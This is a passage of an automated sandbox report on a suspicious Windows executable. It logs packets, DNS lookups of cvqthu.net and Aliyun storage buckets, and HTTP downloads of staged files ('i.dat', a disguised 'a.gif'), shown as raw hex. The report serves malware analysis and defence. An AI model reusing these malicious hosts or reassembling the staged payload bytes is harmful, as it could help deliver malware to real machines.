Jan 7, 2025 04:23:02.310710907 CET	50015	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:23:02.312823057 CET	443	50015	118.178.60.9	192.168.2.4
Jan 7, 2025 04:23:02.312876940 CET	50015	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:23:02.317006111 CET	443	50015	118.178.60.9	192.168.2.4
Jan 7, 2025 04:23:02.317059994 CET	50015	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:23:02.319164038 CET	443	50015	118.178.60.9	192.168.2.4
Jan 7, 2025 04:23:02.319219112 CET	50015	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:23:02.323362112 CET	443	50015	118.178.60.9	192.168.2.4
Jan 7, 2025 04:23:02.323414087 CET	50015	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:23:02.325648069 CET	443	50015	118.178.60.9	192.168.2.4
Jan 7, 2025 04:23:02.325695038 CET	50015	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:23:02.325700998 CET	443	50015	118.178.60.9	192.168.2.4
Jan 7, 2025 04:23:02.325731993 CET	443	50015	118.178.60.9	192.168.2.4
Jan 7, 2025 04:23:02.325745106 CET	50015	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:23:02.325769901 CET	50015	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:23:02.339344025 CET	50015	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:23:02.339354992 CET	443	50015	118.178.60.9	192.168.2.4
Jan 7, 2025 04:23:06.369482994 CET	50017	8917	192.168.2.4	8.217.47.169
Jan 7, 2025 04:23:06.374373913 CET	8917	50017	8.217.47.169	192.168.2.4
Jan 7, 2025 04:23:06.374516010 CET	50017	8917	192.168.2.4	8.217.47.169
Jan 7, 2025 04:23:07.225604057 CET	50017	8917	192.168.2.4	8.217.47.169
Jan 7, 2025 04:23:07.230590105 CET	8917	50017	8.217.47.169	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 04:21:56.750351906 CET	54722	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:21:57.496424913 CET	53	54722	1.1.1.1	192.168.2.4
Jan 7, 2025 04:22:29.627402067 CET	55649	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:22:29.967596054 CET	53	55649	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:05.540816069 CET	52969	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:05.550729990 CET	53	52969	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:11.583236933 CET	54776	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:11.592567921 CET	53	54776	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:17.614515066 CET	57143	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:17.624089956 CET	53	57143	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:23.645767927 CET	63942	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:23.679198027 CET	53	63942	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:29.708278894 CET	64843	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:29.737781048 CET	53	64843	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:35.755342007 CET	55831	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:35.763772011 CET	53	55831	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:41.854692936 CET	62156	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:41.863850117 CET	53	62156	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:47.911534071 CET	62406	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:47.920948029 CET	53	62406	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:53.942656994 CET	64639	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:53.949724913 CET	53	64639	1.1.1.1	192.168.2.4
Jan 7, 2025 04:23:59.973958969 CET	57430	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:23:59.983175039 CET	53	57430	1.1.1.1	192.168.2.4
Jan 7, 2025 04:24:06.021055937 CET	56991	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:24:06.031037092 CET	53	56991	1.1.1.1	192.168.2.4
Jan 7, 2025 04:24:12.052159071 CET	49945	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:24:12.061463118 CET	53	49945	1.1.1.1	192.168.2.4
Jan 7, 2025 04:24:18.083436966 CET	64508	53	192.168.2.4	1.1.1.1
Jan 7, 2025 04:24:18.092664957 CET	53	64508	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 04:21:56.750351906 CET	192.168.2.4	1.1.1.1	0xc6b5	Standard query (0)	jylhok.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:22:29.627402067 CET	192.168.2.4	1.1.1.1	0x5d57	Standard query (0)	22mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:05.540816069 CET	192.168.2.4	1.1.1.1	0xe9e9	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:11.583236933 CET	192.168.2.4	1.1.1.1	0x4120	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:17.614515066 CET	192.168.2.4	1.1.1.1	0x3487	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:23.645767927 CET	192.168.2.4	1.1.1.1	0x6bd7	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:29.708278894 CET	192.168.2.4	1.1.1.1	0xb3c5	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:35.755342007 CET	192.168.2.4	1.1.1.1	0xb141	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:41.854692936 CET	192.168.2.4	1.1.1.1	0x9d97	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:47.911534071 CET	192.168.2.4	1.1.1.1	0x9852	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:53.942656994 CET	192.168.2.4	1.1.1.1	0x1935	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:59.973958969 CET	192.168.2.4	1.1.1.1	0x658f	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:24:06.021055937 CET	192.168.2.4	1.1.1.1	0x54cf	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:24:12.052159071 CET	192.168.2.4	1.1.1.1	0x5f51	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:24:18.083436966 CET	192.168.2.4	1.1.1.1	0xd9c5	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 04:21:57.496424913 CET	1.1.1.1	192.168.2.4	0xc6b5	No error (0)	jylhok.oss-cn-beijing.aliyuncs.com	sc-2a1c.cn-beijing.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 04:21:57.496424913 CET	1.1.1.1	192.168.2.4	0xc6b5	No error (0)	sc-2a1c.cn-beijing.oss-adns.aliyuncs.com	sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 04:21:57.496424913 CET	1.1.1.1	192.168.2.4	0xc6b5	No error (0)	sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		39.103.20.48	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:22:29.967596054 CET	1.1.1.1	192.168.2.4	0x5d57	No error (0)	22mm.oss-cn-hangzhou.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 04:22:29.967596054 CET	1.1.1.1	192.168.2.4	0x5d57	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 04:22:29.967596054 CET	1.1.1.1	192.168.2.4	0x5d57	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.9	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:05.550729990 CET	1.1.1.1	192.168.2.4	0xe9e9	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:11.592567921 CET	1.1.1.1	192.168.2.4	0x4120	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:17.624089956 CET	1.1.1.1	192.168.2.4	0x3487	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:23.679198027 CET	1.1.1.1	192.168.2.4	0x6bd7	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:29.737781048 CET	1.1.1.1	192.168.2.4	0xb3c5	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:35.763772011 CET	1.1.1.1	192.168.2.4	0xb141	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:41.863850117 CET	1.1.1.1	192.168.2.4	0x9d97	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:47.920948029 CET	1.1.1.1	192.168.2.4	0x9852	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:53.949724913 CET	1.1.1.1	192.168.2.4	0x1935	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:23:59.983175039 CET	1.1.1.1	192.168.2.4	0x658f	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:24:06.031037092 CET	1.1.1.1	192.168.2.4	0x54cf	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:24:12.061463118 CET	1.1.1.1	192.168.2.4	0x5f51	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 04:24:18.092664957 CET	1.1.1.1	192.168.2.4	0xd9c5	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jylhok.oss-cn-beijing.aliyuncs.com

22mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	39.103.20.48	443	7648	C:\Users\user\Desktop\287438657364-7643738421.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:21:58 UTC	111	OUT	GET /i.dat HTTP/1.1 User-Agent: GetData Host: jylhok.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:21:59 UTC	557	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:21:58 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 677C9DD6998B3E34339F30DF Accept-Ranges: bytes ETag: "6FE90B6ABE6C4D1079B730F10120B3D1" Last-Modified: Mon, 06 Jan 2025 09:25:58 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 6796293658323038043 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: b+kLar5sTRB5tzDxASCz0Q== x-oss-server-time: 6
2025-01-07 03:21:59 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 5a 49 5c 58 37 33 76 37 44 44 1a 54 3a 79 36 31 58 5b 58 5f 38 71 3e 33 5a 4a 46 5d 3e 2e 73 3e 51 53 11 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 0c 1f 0a 0e 61 65 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 59 4a 5f 5b 34 30 75 34 47 47 19 57 39 7a 35 32 5b 58 5b 5c 3b 72 3d 30 59 49 45 5e 3d 2d 70 3d 52 50 12 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 0d 1e 0b 0f 60 64 21 Data Ascii: l%00ZI\X73v7DDT:y61X[X_8q>3ZJF]>.s>QS_q86999999999999999999999999999999999QMMI:sffae aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33YJ_[40u4GGW9z52[X[\;r=0YIE^=-p=RP^p97888888888888888888888888888888888PLLH;rgg`d!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	39.103.20.48	443	7648	C:\Users\user\Desktop\287438657364-7643738421.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:00 UTC	111	OUT	GET /a.gif HTTP/1.1 User-Agent: GetData Host: jylhok.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:00 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:00 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 677C9DD8F15BB2373860661A Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Mon, 06 Jan 2025 08:35:20 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 11
2025-01-07 03:22:00 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-07 03:22:00 UTC	4096	IN	Data Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2025-01-07 03:22:00 UTC	4096	IN	Data Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-07 03:22:01 UTC	4096	IN	Data Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 Data Ascii: uc}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2025-01-07 03:22:01 UTC	4096	IN	Data Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
2025-01-07 03:22:01 UTC	4096	IN	Data Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
2025-01-07 03:22:01 UTC	4096	IN	Data Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2025-01-07 03:22:01 UTC	4096	IN	Data Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
2025-01-07 03:22:01 UTC	4096	IN	Data Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJL
2025-01-07 03:22:01 UTC	4096	IN	Data Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd Data Ascii: eWUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
